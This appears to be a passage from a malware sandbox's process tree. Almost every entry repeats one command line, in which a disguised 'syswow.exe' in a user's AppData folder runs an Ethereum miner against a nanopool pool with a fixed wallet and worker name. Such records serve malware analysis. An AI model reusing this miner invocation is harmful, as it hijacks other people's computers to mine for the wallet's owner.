                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:6804
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:2216
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:4888
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:6636
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:6324
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:6732
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:1544
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:4964
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:3872
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:6472
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                  PID:708
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:1256
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:3220
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:3052
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:6244
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                            PID:6308
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:6860
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:5516
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6412
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4280
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6540
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:5028
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6180
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:5384
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5592
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                PID:6024
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6820
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6120
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5876
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:5740
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:2860
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:6088
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5260
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6984
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:5148
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:6712
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5252
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:6392
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:6256
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:5812
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:2152
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:3484
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:5796
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6388
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:2992
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5704
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1052
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:296
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1628
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
